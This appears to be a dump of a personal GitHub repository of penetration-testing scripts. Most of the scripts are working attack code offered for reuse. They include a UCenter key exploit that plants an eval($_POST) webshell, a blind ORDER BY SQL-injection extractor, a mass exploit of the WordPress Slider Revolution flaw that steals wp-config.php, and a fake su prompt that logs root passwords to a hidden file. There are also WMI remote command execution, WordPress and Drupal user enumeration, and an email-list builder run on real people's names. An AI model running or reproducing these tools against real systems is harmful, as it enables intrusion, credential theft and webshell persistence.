├── bat └── tips.txt ├── php ├── tips.txt └── wp_login_bruteforce.php ├── pl └── tips.txt ├── py ├── tips.txt ├── eg.txt ├── socket-http.py ├── mygoo.py ├── su_rubbish_hijack.py ├── domailtools.py ├── kali_tools_installer.py ├── replace_mail.py ├── remote_ssh_down.py ├── getdrupaluser.py ├── ophcrack.py ├── bing.py ├── getwpuser.py ├── secwiki.py ├── uc_key_exp.py ├── orderby_sqli.py ├── wp_srp_exp.py ├── google_result.py ├── drupal_bruterforce.py ├── tomcat_crack.py └── cobaltstrike_update.py ├── sh ├── tips.txt ├── wp_user_bruterforce.sh └── pentest4ubuntu.sh ├── vbs ├── tips.txt ├── vbexec.vbs ├── iis6_remove_log.vbs └── cmd.asp.vbs ├── powershell └── tips.txt ├── README.md ├── conf └── vimrc.dark └── export.opml /bat/tips.txt: -------------------------------------------------------------------------------- 1 | bat -------------------------------------------------------------------------------- /php/tips.txt: -------------------------------------------------------------------------------- 1 | php -------------------------------------------------------------------------------- /pl/tips.txt: -------------------------------------------------------------------------------- 1 | perl -------------------------------------------------------------------------------- /py/tips.txt: -------------------------------------------------------------------------------- 1 | python -------------------------------------------------------------------------------- /sh/tips.txt: -------------------------------------------------------------------------------- 1 | bash -------------------------------------------------------------------------------- /vbs/tips.txt: -------------------------------------------------------------------------------- 1 | vbs -------------------------------------------------------------------------------- /powershell/tips.txt: -------------------------------------------------------------------------------- 1 | powershell 
-------------------------------------------------------------------------------- /sh/wp_user_bruterforce.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/darkr4y/pentest-script/HEAD/sh/wp_user_bruterforce.sh -------------------------------------------------------------------------------- /py/eg.txt: -------------------------------------------------------------------------------- 1 | Megan Greene, Nonresident Senior Fellow 2 | Alexei Monsarrat, Nonresident Senior Fellow 3 | 4 | Barry Pavel, Vice President and Director 5 | Jeffrey Lightfoot, Deputy Director 6 | Magnus Nordenman, Deputy Director 7 | HuiHui Ooi, Assistant Director 8 | 9 | -------------------------------------------------------------------------------- /py/socket-http.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin env python 2 | import socket 3 | host="www.blackh4t.org" 4 | port=80 5 | se=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 6 | se.connect((host,port)) 7 | se.send("GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\r\nHost: %s\r\n\r\n" % host) 8 | while True: 9 | result = se.recv(1024) 10 | if not len(result ): 11 | break 12 | print result 13 | -------------------------------------------------------------------------------- /py/mygoo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2,urllib 4 | import simplejson 5 | 6 | seachstr = 'inurl:docs/funcspecs/3.jsp' 7 | 8 | for x in range(5): 9 | print "page:%s" % (x+1) 10 | page = x * 4 11 | url = ('https://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=%s&rsz=8&start=%s') % (urllib.quote(seachstr),page) 12 | try: 13 | request = urllib2.Request( 14 | url, None, {'Referer': 'http://www.sina.com'}) 15 | response = urllib2.urlopen(request) 16 | results = simplejson.load(response) 17 | infoaaa 
= results['responseData']['results'] 18 | except Exception,e: 19 | print e 20 | else: 21 | for minfo in infoaaa: 22 | print minfo['url'] 23 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | #pentest-script 2 | 3 | ``` 4 | ___ ___ __ .__ ____________________ __________ ._. 5 | / | \_____ ____ | | _|__| ____ ____ / | \_ _____/ | \ \| | 6 | / ~ \__ \ _/ ___\| |/ / |/ \ / ___\ / | || __) | | / | \ | 7 | \ Y // __ \\ \___| <| | | \/ /_/ > ^ / \ | | / | \| 8 | \___|_ /(____ /\___ >__|_ \__|___| /\___ /\____ |\___ / |______/\____|__ /_ 9 | \/ \/ \/ \/ \//_____/ |__| \/ \/\/ 10 | 11 | ``` 12 | 13 | ####scripts used in my pentest work. 14 | 15 | aciiart made from - http://patorjk.com/software/taag/ 16 | -------------------------------------------------------------------------------- /py/su_rubbish_hijack.py: -------------------------------------------------------------------------------- 1 | #set alias = xxx.py 2 | #!/usr/bin/python 3 | import os, sys, getpass, time 4 | 5 | current_time = time.strftime("%Y-%m-%d %H:%M") 6 | logfile="/dev/shm/.su.log" 7 | #CentOS 8 | #fail_str = "su: incorrect password" 9 | #Ubuntu 10 | #fail_str = "su: Authentication failure" 11 | #For Linux Korea - centos,ubuntu,korea 切换root用户失败提示不一样 12 | fail_str = "su: incorrect password" 13 | try: 14 | passwd = getpass.getpass(prompt='Password: '); 15 | file=open(logfile,'a') 16 | file.write("[%s]t%s"%(passwd, current_time)) 17 | file.write('n') 18 | file.close() 19 | except: 20 | pass 21 | time.sleep(1) 22 | print fail_str 23 | -------------------------------------------------------------------------------- /py/domailtools.py: -------------------------------------------------------------------------------- 1 | #encoding: UTF-8 2 | 3 | import urllib2 4 | import re 5 | import socket 6 | import time 7 | 8 | rfile = open('./ip.txt') 9 | 10 | wfile = open('./result.csv', 'a+') 11 
| 12 | for line in rfile: 13 | 14 | opener = urllib2.build_opener() 15 | time.sleep(0.5) 16 | opener.addheaders = [('User-Agent', 'Mozilla/6.0 (Linux 5.5; rv:6.0.2) Gecko/20140101 Firefox/6.0.0')] 17 | req = opener.open('http://reverseip.domaintools.com/search/?q='+line.strip()) 18 | socket.setdefaulttimeout(8) 19 | responseHtml = req.read() 20 | match = re.findall(r'', responseHtml) 21 | wfile.write(socket.gethostbyname(line.strip())+','+'\n') 22 | 23 | print line.strip() 24 | 25 | for val in match: 26 | wfile.write(val+','+'\n') 27 | wfile.write('\n') 28 | rfile.close() 29 | wfile.close() 30 | -------------------------------------------------------------------------------- /py/kali_tools_installer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #coding=utf-8 3 | 4 | import commands 5 | import sys 6 | 7 | 8 | _base = "git://git.kali.org/" 9 | _catlog = "packages/" 10 | _extname = ".git" 11 | 12 | def get_kali_toollist(): 13 | print "Site - http://tools.kali.org/tools-listing" 14 | pass 15 | 16 | def show_sys_ver(): 17 | print "Your linux is :" 18 | print commands.getoutput("cat /etc/issue") 19 | pass 20 | 21 | def check_git(): 22 | 23 | pass 24 | def install( name ): 25 | url = _base + _catlog + name + _extname 26 | #print url 27 | print commands.getoutput("git clone " + url) 28 | pass 29 | 30 | def usage(): 31 | print sys.argv[0] + " install [ tool name ]" 32 | pass 33 | 34 | def main(): 35 | if len(sys.argv) != 3: 36 | usage() 37 | return 38 | pass 39 | show_sys_ver() 40 | get_kali_toollist() 41 | toolname = sys.argv[2] 42 | print "u will install [ " + toolname + " ]" 43 | install(toolname) 44 | pass 45 | 46 | if __name__ == '__main__': 47 | main() 48 | -------------------------------------------------------------------------------- /vbs/vbexec.vbs: -------------------------------------------------------------------------------- 1 | Option Explicit 2 | Dim target, username, password, strCommand, 
objSWbemLocator, objSWbemServices, objProcess, intProcessID, errReturn 3 | If WScript.Arguments.Count = 4 Then 4 | target = WScript.Arguments.Item(0) 5 | username = WScript.Arguments.Item(1) 6 | password = WScript.Arguments.Item(2) 7 | strCommand = WScript.Arguments.Item(3) 8 | Else 9 | Wscript.Echo "Usage: vbExec.vbs target username password command" 10 | Wscript.Quit 11 | End If 12 | set objSWbemLocator = CreateObject("WbemScripting.SWbemLocator") 13 | set objSWbemServices = objSWbemLocator.ConnectServer(target, "root\cimv2", username, password) 14 | objSWbemServices.Security_.ImpersonationLevel = 3 15 | objSWbemServices.Security_.AuthenticationLevel = 6 16 | set objProcess = objSWbemServices.Get("Win32_Process") 17 | errReturn = objProcess.Create(strCommand, null, null, intProcessID) 18 | If errReturn = 0 Then 19 | Wscript.Echo "Process was started with ID: " & intProcessID 20 | Else 21 | Wscript.Echo "Process could not be started due to error: " & errReturn 22 | End If 23 | -------------------------------------------------------------------------------- /py/replace_mail.py: -------------------------------------------------------------------------------- 1 | #coding=utf8 2 | 3 | #replace like Damon M. 
Wilson,Digital Department 4 | #to DMWilson@domain.com - u can test with eg.txt 5 | #by darkr4y | thx tm3y ;) 6 | import re 7 | 8 | 9 | def main(): 10 | path = raw_input("Plz input the path of maillist:") 11 | f = open(path,"r") 12 | for line in f: 13 | newline,numbers = re.subn(",(.*)","",line) 14 | if newline == "\n": 15 | continue 16 | newline = newline.strip() 17 | splitline = newline.split(" ") 18 | #print splitline 19 | if len(splitline) == 2: 20 | inline = splitline[0][:1] + splitline[-1] 21 | if len(splitline) == 3: 22 | inline = splitline[0][:1] + splitline[1][:1] + splitline[-1] 23 | inline += "@test.com" 24 | inline = inline.replace("\n","") 25 | inline = inline.lower() 26 | #print `newline`, 27 | print inline 28 | #break 29 | pass 30 | f.close() 31 | 32 | 33 | if __name__ == "__main__": 34 | main() 35 | pass 36 | -------------------------------------------------------------------------------- /py/remote_ssh_down.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | from __future__ import with_statement 5 | from fabric.api import cd,run,env,settings,hide 6 | import socket 7 | from StringIO import StringIO 8 | 9 | hostname = 'home.blackh4t.org' 10 | ip = socket.gethostbyname(hostname) 11 | username = 'root' 12 | password = '' 13 | port = '29441' 14 | env.hosts=[username + '@' + ip + ':'+ port,] #ssh要用到的参数 15 | env.password = password 16 | 17 | def down(url): 18 | strio = StringIO() 19 | print "[***] remote ssh simple http file server ..." 
20 | with settings( 21 | hide('warnings', 'running','output'), #stdout , stderr 22 | warn_only=True 23 | ): 24 | with cd('/tmp'): 25 | wget_rs = run('wget -O --no-check-certificate ' + url) #远程操作用run 26 | # Saving to: `packer_0.8.1_darwin_amd64.zip.6' 27 | print type(wget_rs) 28 | print wget_rs 29 | 30 | 31 | #print 'http://' + ip + '/' + save_name 32 | run('python -m SimpleHTTPServer 8888' , stdout = strio) 33 | 34 | ''' 35 | !!!first use!!! 36 | pip install fabric 37 | usage: 38 | fab -f remote_ssh_down down:url=xxxx 39 | sh -c "echo " 40 | - bash file content - 41 | =============================================== 42 | 43 | ''' 44 | -------------------------------------------------------------------------------- /py/getdrupaluser.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import sys 3 | import urllib 4 | import re 5 | 6 | host = "" 7 | url_v = "" 8 | url_u = "" 9 | user = [] 10 | 11 | def usage(): 12 | print "Get Drupal Users" 13 | print "From - http://www.madirish.net/node/465" 14 | print "Usage: getuser_drupal.py host" 15 | 16 | 17 | def check_version(): 18 | pass 19 | 20 | def enum_user(): 21 | pass 22 | 23 | def main(): 24 | global host 25 | global user 26 | if len(sys.argv) == 2: 27 | host = sys.argv[1] 28 | url_v = 'http://'+ host + '/CHANGELOG.txt' 29 | url_u = 'http://'+ host + '/?q=admin/views/ajax/autocomplete/user/' 30 | r = urllib.urlopen(url_v) 31 | r.readline() #igone blank line 32 | print "version: " + r.readline() 33 | r = "" 34 | for i in xrange(97,123,1): 35 | #print "Detecting .... 
" + chr(i) 36 | r = urllib.urlopen(url_u + chr(i)).read() 37 | #s = re.sub('"(.*?)"',r'\1',r) 38 | s = re.findall('"(.*?)"',r) 39 | user.extend(s) 40 | 41 | user = {}.fromkeys(user).keys() 42 | #print user 43 | for s in user: 44 | print s 45 | print 46 | print "-------------------------------------------------------" 47 | print "Someone has coded a nice tool" 48 | print "From - http://www.madirish.net/index.html?article=443" 49 | else: 50 | usage() 51 | pass 52 | 53 | 54 | 55 | if __name__ == "__main__": 56 | main() 57 | -------------------------------------------------------------------------------- /py/ophcrack.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import urllib 3 | import urllib2 4 | import re 5 | import time 6 | 7 | SITE = "http://www.objectif-securite.ch/en/ophcrack.php" 8 | 9 | def post(url, data): 10 | req = urllib2.Request(url) 11 | data = urllib.urlencode(data) 12 | #enable cookie 13 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor()) 14 | response = opener.open(req, data) 15 | return response.read() 16 | 17 | def checkhash(temp_hash): 18 | global SITE 19 | d = {'hash':temp_hash} 20 | r = post(SITE,d) 21 | #print r 22 | s = re.findall('(.*?)<\/table>',r) 23 | ss = re.findall('(.*?)<\/b>',s[0]) 24 | print 25 | print ss[1] 26 | print "-------------------------------------------" 27 | print "By Ma5ter" 28 | pass 29 | 30 | def usage(): 31 | print "Ophcrack NTLM Hash" 32 | print "Usage: ophcrack.py hash" 33 | print "Usage: ophcrack.py -f hash-file" 34 | print "-------------------------------------------" 35 | print "hash-format: username(current):x32:x32::::" 36 | 37 | def main(): 38 | if len(sys.argv) == 2: 39 | _hash = sys.argv[1] 40 | checkhash(_hash) 41 | 42 | elif len(sys.argv) == 3: 43 | if (sys.argv[1] == "-f"): 44 | f = open(sys.argv[2],'r') 45 | for i in f: 46 | i = i.strip() 47 | print i 48 | pass 49 | else: 50 | usage() 51 | 52 | else: 53 | usage() 54 | pass 55 | 56 | 57 | 
58 | if __name__ == "__main__": 59 | main() 60 | -------------------------------------------------------------------------------- /conf/vimrc.dark: -------------------------------------------------------------------------------- 1 | "=========================================================================================================== 2 | "added by darkray 3 | " 第一次更新 2014 - 06 4 | " 说明链接 http://hi.baidu.com/aroundtw/item/6bb43652c7c84e928c12ede4 5 | " todo-list: 6 | " 1.完善每项设置的中文注释 7 | " 2.增加流行的插件管理方式 8 | " 一个已经配置好的轻量的 http://www.oschina.net/code/snippet_616273_13749 9 | "=========================================================================================================== 10 | " wget https://github.com/darkr4y/pentest-script/raw/master/conf/vimrc.dark && cat vimrc.dark >> /etc/vim/vimrc 11 | 12 | " 设置帮助信息语言 13 | set helplang=cn 14 | " 显示行号 15 | set nu 16 | " 语法高亮 17 | syntax enable 18 | syntax on 19 | " 当前配色方案 20 | colorscheme desert 21 | 22 | " 这里没查到是神码意思 23 | se nocompatible 24 | se bs=2 25 | 26 | 27 | 28 | " 保存文件快捷键 29 | " 使用ctrl+s保存文件 30 | " note: you must add in ${HOME}/.bashrc 31 | nmap :update 32 | vmap :update 33 | imap :update 34 | 35 | " 退出快捷键 36 | " 使用ctrl+q退出vim 37 | nmap :quit 38 | vmap :quit 39 | imap :quit 40 | 41 | " set fold 42 | " za 打开/关闭当前折叠 43 | " zA 循环地打开/关闭当前折叠 44 | " zo 打开当前折叠 45 | " zc 关闭当前折叠 46 | " zM 关闭所有折叠 47 | " zR 打开所有折叠 48 | set foldmethod=syntax 49 | set foldlevel=100 50 | 51 | " Tab缩进相关配置 52 | set smarttab 53 | set tabstop=4 54 | set softtabstop=4 55 | "设置为4个空格表示一个tab 56 | set shiftwidth=4 57 | set expandtab 58 | "继承前一行的缩进方式,特别适用于多行注释 59 | set autoindent 60 | "为C程序提供自动缩进 61 | set smartindent 62 | "使用C样式的缩进 63 | set cindent 64 | " 在状态行上显示光标所在位置的行号和列号 65 | set ruler 66 | set rulerformat=%20(%2*%<%f%=\ %m%r\ %3l\ %c\ %p%%%) 67 | 68 | 69 | " 记住上次编辑位置 70 | au BufReadPost * if line("'\"") > 0|if line("'\"") <= line("$")|exe("norm '\"")|else|exe "norm $"|endif|endif 71 | 72 | " 设置高亮搜索 73 | set hlsearch 74 | 75 | " 
自动检测对应文件类型并加载配置 76 | filetype plugin indent on 77 | 78 | " 光标所在行高亮 79 | set cursorline 80 | 81 | " 默认搜索忽略大小 82 | set ignorecase 83 | 84 | " 默认不产生备份文件 85 | set nobackup 86 | 87 | 88 | -------------------------------------------------------------------------------- /py/bing.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import socket 3 | import urllib2 4 | import re 5 | 6 | SITE_LIST = [] 7 | SEARCHURL = "http://www.bing.com/search?q=ip:" 8 | 9 | enable_proxy = False 10 | proxy_handler = urllib2.ProxyHandler({"http" : 'http://127.0.0.1:8080'}) 11 | null_proxy_handler = urllib2.ProxyHandler({}) 12 | 13 | if enable_proxy: 14 | opener = urllib2.build_opener(proxy_handler) 15 | else: 16 | opener = urllib2.build_opener(null_proxy_handler) 17 | 18 | urllib2.install_opener(opener) 19 | #---------------------------------------------------------------- 20 | def usage(): 21 | print "Bing Batch Search Tools" 22 | print "Usage: bing.py www.blackh4t.org" 23 | print "Usage: bing.py -s 8.8.8.8" 24 | 25 | def main(): 26 | global SITE_LIST 27 | global SEARCHURL 28 | if len(sys.argv) == 2: 29 | host = sys.argv[1] 30 | ip = socket.gethostbyname(host) 31 | print ip 32 | request = urllib2.Request(SEARCHURL + ip) 33 | request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 5.2; rv:28.0) Gecko/20100101 Firefox/28.0') 34 | request.add_header('Accept-Language', 'en-US,en;q=0.5') 35 | r = urllib2.urlopen(request).read() 36 | count = re.findall('(.*?)<\/span>',r) 37 | print "total: " + count[0] 38 | site = re.findall('(.*?)<\/cite>',r) 39 | print site 40 | r.close() 41 | #eg: page 5 - first=41 42 | print "because of BING's restrick,only 10 pages result can crawled." 
43 | for i in xrange(11,31,10): 44 | print SEARCHURL + ip + "&first=" + str(i) 45 | request = urllib2.Request(SEARCHURL + ip + "&first=" + i) 46 | request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 5.2; rv:28.0) Gecko/20100101 Firefox/28.0') 47 | request.add_header('Accept-Language', 'en-US,en;q=0.5') 48 | r = urllib2.urlopen(request).read() 49 | sites = re.findall('(.*?)<\/cite>',r) 50 | print sites 51 | r.close() 52 | 53 | 54 | elif len(sys.argv) == 3: 55 | if sys.argv[1] == '-s': 56 | pass 57 | print "-------------------------------------------------------" 58 | else: 59 | usage() 60 | pass 61 | 62 | 63 | 64 | if __name__ == "__main__": 65 | main() 66 | -------------------------------------------------------------------------------- /py/getwpuser.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import sys 3 | import urllib 4 | import httplib 5 | import re 6 | import urlparse 7 | #import requests 8 | 9 | count = 100 10 | #httplib.HTTPConnection.debuglevel = 1 11 | 12 | def savefile(text): 13 | pass 14 | 15 | def checktitle(target): 16 | i = 1 17 | for i in range(count): 18 | url='http://' + target + '/?author=%s' % i 19 | pattern='(.*) \|' 20 | try: 21 | #r=requests.get(url) 22 | r = urllib.urlopen(url).read() 23 | except Exception,e: 24 | print e 25 | #text=r.text 26 | text = r 27 | regux=re.compile(pattern) 28 | result=regux.findall(text) 29 | print result 30 | re_str=''.join(result) 31 | if re_str not in [u'\u672a\u627e\u5230\u9875\u9762']: 32 | n_str=str(i)+':'+re_str 33 | print n_str 34 | #print "%d:%s" % (i,list) 35 | 36 | ## BUG: cannot get from Freebuf.com 37 | 38 | def checkurl(target): 39 | i = 1 40 | for i in range(count): 41 | conn = httplib.HTTPConnection(target) 42 | headers={"User-Agent":"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"} 43 | conn.request('GET','/?author=%s' % i,headers=headers) 44 | r = conn.getresponse() 45 | #print r.status 46 | if r.status 
== 301: 47 | url = 'http://' + target + '/?author=%s' % i 48 | a = urllib.urlopen(url).geturl() 49 | a = urlparse.urlparse(a) 50 | #print 'path:',a.path 51 | #astr = a.path[:-1] 52 | #astr = astr[astr.rindex('/')+1:] 53 | apos = a.path.rindex('/') 54 | bpos = len(a.path.split('/')) 55 | if apos == len(a.path)-1 : 56 | print a.path.split('/')[bpos-2] 57 | else: 58 | print a.path.split('/')[bpos-1] 59 | #print str(i) + ':' + astr 60 | 61 | 62 | 63 | def usage(): 64 | print '<Usage>:' 65 | print '\t GetWPUser <type> <url>' 66 | print '<Type> :' 67 | print '\t 1 - From Title' 68 | print '\t 2 - From URL (Handler 302)' 69 | print '<Eg.> :' 70 | print '\t GetWPUser 2 www.blackh4t.org' 71 | print '' 72 | print '\t\t\t by DarkR4y.' 73 | 74 | def main(): 75 | if len(sys.argv) == 3: 76 | t = sys.argv[1] 77 | target = sys.argv[2] 78 | if t == '1': 79 | checktitle(target) 80 | if t == '2': 81 | checkurl(target) 82 | else: 83 | usage() 84 | pass 85 | 86 | 87 | 88 | if __name__ == "__main__": 89 | main() 90 | 91 | -------------------------------------------------------------------------------- /py/secwiki.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys 3 | import time 4 | import urllib2 5 | #import urllib 6 | #import re 7 | from sgmllib import SGMLParser 8 | 9 | 10 | 11 | class ListURL(SGMLParser): 12 | def reset(self): 13 | self.URLlist = [] 14 | self.flag = False 15 | self.getdata = False 16 | self.verbatim = 0 17 | self.URLs = [] 18 | SGMLParser.reset(self) 19 | 20 | def start_table(self, attrs): 21 | self.flag = True 22 | #print self.flag 23 | if self.flag == True: 24 | self.verbatim +=1 25 | return 26 | 27 | 28 | def end_table(self): 29 | if self.verbatim == 0: 30 | self.flag = False 31 | if self.flag == True: 32 | self.verbatim -=1 33 | 34 | def start_a(self, attrs): 35 | if self.flag == False: 36 | return 37 | #self.getdata = True 38 | for k,v in attrs: 39 | if k == 'target' and v == '_blank': 
40 | self.getdata = True 41 | href = [v for k, v in attrs if k == "href" and v.find('index.php?type=')<0 ] 42 | self.URLs.extend(href) 43 | 44 | 45 | 46 | 47 | def end_a(self): 48 | if self.getdata: 49 | self.getdata = False 50 | 51 | def handle_data(self, text): 52 | if self.getdata: 53 | self.URLlist.append(text) 54 | 55 | def printTitle(self): 56 | for i in self.URLlist: 57 | print i 58 | for j in self.URLs: 59 | print j 60 | 61 | def printURL(self): 62 | for i in self.URLs: 63 | print i 64 | 65 | 66 | 67 | 68 | if len(sys.argv) < 2: 69 | print '\nUsage:' 70 | print '\t%s --dump' % sys.argv[0] 71 | print '\t%s --about' % sys.argv[0] 72 | sys.exit(1) 73 | 74 | def banner(): 75 | print ''' 76 | dump secwiki urls... 77 | by DarkR4y. 78 | BLog: www.blackh4t.org 79 | ''' 80 | 81 | option = sys.argv[1] 82 | 83 | 84 | if option == '--dump': 85 | 86 | try: 87 | #banner() 88 | 89 | def secwiki(): 90 | site = 'http://wiki.ourren.com/' 91 | for p in range(1,47): 92 | rest = 'index.php?p=%s' % p 93 | req = urllib2.Request(site+rest) 94 | try: 95 | fd = urllib2.urlopen(req) 96 | data = fd.read() 97 | #print data 98 | t = ListURL() 99 | t.feed(data) 100 | t.printTitle() 101 | t.printURL() 102 | 103 | except urllib2.URLError: print '[+] site: %s \t\t\t[+] Error: seems to be down' % site 104 | 105 | secwiki() 106 | 107 | 108 | except KeyboardInterrupt: print '\nTerminated by user ...' 109 | 110 | elif option == '--about': 111 | banner() 112 | 113 | else: banner() 114 | -------------------------------------------------------------------------------- /py/uc_key_exp.py: -------------------------------------------------------------------------------- 1 | #! 
/usr/bin/env python 2 | #coding=utf-8 3 | import hashlib 4 | import time 5 | import math 6 | import base64 7 | import urllib 8 | import urllib2 9 | import sys 10 | 11 | def microtime(get_as_float = False) : 12 | if get_as_float: 13 | return time.time() 14 | else: 15 | return '%.8f %d' % math.modf(time.time()) 16 | 17 | def get_authcode(string, key = ''): 18 | ckey_length = 4 19 | key = hashlib.md5(key).hexdigest() 20 | keya = hashlib.md5(key[0:16]).hexdigest() 21 | keyb = hashlib.md5(key[16:32]).hexdigest() 22 | keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:] 23 | #keyc = (hashlib.md5('0.736000 1389448306').hexdigest())[-ckey_length:] 24 | cryptkey = keya + hashlib.md5(keya+keyc).hexdigest() 25 | 26 | key_length = len(cryptkey) 27 | string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string 28 | string_length = len(string) 29 | result = '' 30 | box = range(0, 256) 31 | rndkey = dict() 32 | for i in range(0,256): 33 | rndkey[i] = ord(cryptkey[i % key_length]) 34 | j=0 35 | for i in range(0,256): 36 | j = (j + box[i] + rndkey[i]) % 256 37 | tmp = box[i] 38 | box[i] = box[j] 39 | box[j] = tmp 40 | a=0 41 | j=0 42 | for i in range(0,string_length): 43 | a = (a + 1) % 256 44 | j = (j + box[a]) % 256 45 | tmp = box[a] 46 | box[a] = box[j] 47 | box[j] = tmp 48 | result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256])) 49 | return keyc + base64.b64encode(result).replace('=', '') 50 | 51 | def get_shell(url,key,host): 52 | ''' 53 | 发送命令获取webshell 54 | ''' 55 | headers={'Accept-Language':'zh-cn', 56 | 'Content-Type':'application/x-www-form-urlencoded', 57 | 'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)', 58 | 'Referer':url 59 | } 60 | tm = time.time()+10*3600 61 | tm="time=%d&action=updateapps" %tm 62 | code = urllib.quote(get_authcode(tm,key)) 63 | url=url+"?code="+code 64 | data1='''<?xml version="1.0" encoding="ISO-8859-1"?> 65 | <root> 66 | <item id="UC_API">http://xxx\');eval($_POST[1]);//</item> 67 | 
</root>''' 68 | try: 69 | req=urllib2.Request(url,data=data1,headers=headers) 70 | ret=urllib2.urlopen(req) 71 | except: 72 | return "访问出错" 73 | data2='''<?xml version="1.0" encoding="ISO-8859-1"?> 74 | <root> 75 | <item id="UC_API">http://aaa</item> 76 | </root>''' 77 | try: 78 | req=urllib2.Request(url,data=data2,headers=headers) 79 | ret=urllib2.urlopen(req) 80 | except: 81 | return "error" 82 | return "webshell:"+host+"/config/config_ucenter.php,password:1" 83 | 84 | if __name__ == '__main__': 85 | host=sys.argv[1] 86 | key=sys.argv[2] 87 | url=host+"/api/uc.php" 88 | print get_shell(url,key,host) 89 | -------------------------------------------------------------------------------- /py/orderby_sqli.py: -------------------------------------------------------------------------------- 1 | # ORDER BY data extractor (bogdan [at] acunetix.com) 2 | import httplib, urllib, sys, string 3 | from string import replace 4 | # various configuration parameters 5 | HOSTNAME = "ctf.xdsec.org" 6 | PORT = "2013" 7 | URL = "/hackgame/injection/index.php?order=" 8 | # the string that is returned when the condition is true 9 | #TRUE_STRING = "1 - <b>admin</b> - Clear Rivers - admin@email.com<br> 3- <b>John</b>" 10 | TRUE_STRING = "<td>1</td><td>欢迎来到西电网络攻防大赛</td><td>2013-09-30</td></tr><tr><td>2</td><td>西电网络攻防大赛已成功举办三届,本届为第四届</td><td>2013-09-30</td></tr><tr><td>3</td><td>参赛选手以队为单位参赛,每队1-3人,每名选手只能参加一支参赛队伍</td><td>2013-10-01</td></tr><tr><td>4</td><td>全国各地的安全技术爱好者均可参赛,特别鼓励在校学生参赛。各参赛队应该如实填写个人信息,参赛队所有核心</td>" 11 | # function to perform the actual data extraction using boolean queries 12 | def extract_data(extract_data_query): 13 | print "Query: " + extract_data_query 14 | result = "" 15 | # bits array 16 | bits = [1, 2, 4, 8, 16, 32, 64, 128] 17 | char = 1 18 | while (1): 19 | i = 0 20 | value = 0 21 | while (i < 8): 22 | # prepare request 23 | h1 = httplib.HTTPConnection(HOSTNAME, PORT, timeout=20) 24 | params = {} 25 | # http headers 26 | headers = {"Host": HOSTNAME, 27 | "Accept": 
"*/*", 28 | "User-Agent": "Mozilla/4.0 (Acunetix WVS)"} 29 | # prepare SQL query 30 | query = "(case when (ORD(MID((" + extract_data_query + ")," + str(char) + ",1))& " + str(bits[i]) + " >0) then id else 3 end)" 31 | # make HTTP request 32 | h1.request("GET", URL + urllib.quote_plus(query), params, headers) 33 | try: 34 | r1 = h1.getresponse() 35 | except: 36 | print "error ..." 37 | sys.exit() 38 | # check HTTP status code (we are looking for a 200 response) 39 | if r1.status <> 200: 40 | print "invalid status code: " + str(r1.status) 41 | sys.exit() 42 | # good status code, move on ... 43 | data = r1.read() 44 | # determine bit value based on data, search true string 45 | if string.find(data, TRUE_STRING) != -1: 46 | print "1", 47 | value = value + bits[i] 48 | else: 49 | print "0", 50 | h1.close() 51 | # move to the next bit 52 | i = i + 1 53 | # game over? 54 | if value == 0: 55 | print " DONE" 56 | return result 57 | else: 58 | print " => " + str(value) + " => '" + chr(value) + "'" 59 | # save the current char, move on to the next one 60 | result = result + chr(value) 61 | char = char + 1 62 | # main function 63 | def main(): 64 | # check for input params 65 | if len(sys.argv)<=1: 66 | print "usage orderby.py SQL_QUERY_TO_EXTRACT_DATA" 67 | sys.exit() 68 | query = sys.argv[1] 69 | print "[*] ORDER BY data extractor (bogdan [at] acunetix.com) [*]" 70 | print "" 71 | # extract the data 72 | data = extract_data(query) 73 | print "" 74 | print "result => " + data 75 | if __name__ == '__main__': 76 | main() 77 | -------------------------------------------------------------------------------- /py/wp_srp_exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding:utf-8 3 | # Author: DarkR4y | www.blackh4t.org 4 | # Purpose: 5 | # Some code copy from - http://kendyhikaru.blogspot.com/2012/10/python-multithread-to-read-one-file.html 6 | # Vuln detail - 
http://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html 7 | import os,sys 8 | import urllib,urllib2 9 | import re 10 | import thread,threading,Queue 11 | import urlparse 12 | import logging 13 | import time 14 | #为了解决异常 15 | import socket 16 | import httplib 17 | 18 | logfile = 'log.txt' 19 | logger = logging.getLogger() 20 | hdlr = logging.FileHandler(logfile) 21 | formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s') 22 | hdlr.setFormatter(formatter) 23 | logger.addHandler(hdlr) 24 | logger.setLevel(logging.NOTSET) 25 | 26 | savepath = os.getcwd() + os.path.sep + 'rs' + os.path.sep 27 | payload = "wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php" 28 | #Number of threads 29 | n_thread = 5 30 | #Create queue 31 | queue = Queue.Queue() 32 | 33 | class ThreadProcess(threading.Thread): 34 | def __init__(self, queue): 35 | threading.Thread.__init__(self) 36 | self.queue = queue 37 | 38 | def exp(self,url,name): 39 | print "Exploiting - %s" % url 40 | try: 41 | f = urllib2.urlopen(url, timeout=5).read() 42 | if (f[:2] == "<?"): 43 | with open(name, "wb") as code: 44 | code.write(f) 45 | else: 46 | logger.info(url + " has no vuln") 47 | #print url + " has no vuln!" 
